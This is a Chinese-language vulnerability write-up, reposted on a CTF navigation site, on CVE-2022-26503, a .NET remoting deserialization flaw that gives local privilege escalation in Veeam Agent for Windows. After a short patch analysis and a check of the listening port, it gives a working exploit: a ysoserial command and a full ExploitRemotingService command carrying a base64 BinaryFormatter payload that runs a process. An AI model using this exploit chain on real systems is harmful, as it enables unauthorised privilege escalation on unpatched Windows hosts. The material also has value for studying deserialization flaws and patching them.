CTF导航 CTF导航

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

渗透技巧 2年前 (2022) admin
540 0 0

 

漏洞分析

补丁

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTcpChannelOptions)

用CBinaryServerFormatterSink新的反序列化类替换TypeFilterLevel.Full。

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

需要用户账号密码。port向上追溯

Veeam.Backup.Common.COptions.BackupServerPort

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

从注册表取值9395

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

在日志中发现C:\ProgramData\Veeam\Endpoint\Svc.VeeamEndpointBackup.log只监听了127.0.0.1,所以只能本地提权用。

继续找一下rem的地址 VeeamService

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

利用

使用https://github.com/tyranid/ExploitRemotingService直接打

CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter -c calc
ExploitRemotingService.exe --secure --user .\administrator --pass admin16!@#  -useser tcp://127.0.0.1:9395/VeeamService raw AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAsgU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYyIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L
BASH

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

原文始发于Y4er:CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

版权声明:admin 发表于 2022年3月23日 下午1:45。
转载请注明:CVE-2022-26503 Veeam Agent for Microsoft Windows LPE | CTF导航

相关文章

Malware development: persistence – part 21. Recycle Bin, My Documents COM extension handler. Simple C++ example.
admin
543
Mute the Sound: Chaining Vulnerabilities to Achieve RCE on Outlook: Pt 2
admin
27
干货分享 | 利用.NET回调函数执行任意命令
admin
452
DSRE-数据安全风险枚举知识框架
admin
528
每日安全动态推送(08-23)
admin
447
防御规避机制解读(The Mechanics of Defense Evasion)
admin
614

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

geoserver代码审计
0
代理(ATT&CK篇)
0
CVE-2024-24576 Windows 下多语言命令注入漏洞分析
0
Ray OS 2.6.3 Command Injection
0
Moodle 3.10.1 – Authenticated Blind Time-Based SQL Injection – “sort” parameter
0
Online Fire Reporting System OFRS – SQL Injection Authentication Bypass
0
How a Race Condition Vulnerability Could Cast Multiple Votes
0
CVE-2024-20697: WINDOWS LIBARCHIVE REMOTE CODE EXECUTION VULNERABILITY
0
Passbolt: a bold use of HaveIBeenPwned
0
Fake Dialog Boxes to Make Malware More Convincing
0